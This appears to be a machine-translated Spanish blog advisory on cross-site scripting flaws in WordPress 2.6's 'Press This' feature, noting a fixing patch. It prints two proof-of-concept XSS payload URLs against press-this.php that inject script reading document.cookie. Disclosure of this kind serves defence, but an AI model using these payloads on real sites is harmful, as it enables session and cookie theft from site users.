WordPress Pulse este (WP 2.6) características está expuesta a múltiples cross-site scripting cuestiones porque no desinfectar suficientemente proporcionados por el usuario de entrada. La cuestión se puede encontrar en Wordpress TRAC # 7220 POC
* / wp-admin/press-this.php /? ajax = video & s =% 3C/textarea% 3E% 3Cscript% 3Ealert (document.cookie)% 3C/script% 3E * / wp-admin/press-this.php /? thickbox ajax = + i =% 22% 3E% 3Cscript% 3Ealert (document.cookie)% 3C/script% 3E
Revisión
el último parche # 8320 (07/09/08 19:51:53) por Ryan










No Responses to "Wordpress" Presione Esta "vulnerabilidad XSS Múltiples"
Si tiene algún comentario, por favor, lea las siguientes directrices. Estos están diseñados para proteger a usted ya los demás usuarios del sitio.
Con el fin de mantener estas experiencias agradable e interesante para todos nuestros usuarios, le pedimos que siga las Directrices. Siéntase libre para participar, hacer preguntas, y nos dicen lo que están pensando! perspicaces comentarios son la mayoría acogió con beneplácito.
ser el primero en comentar.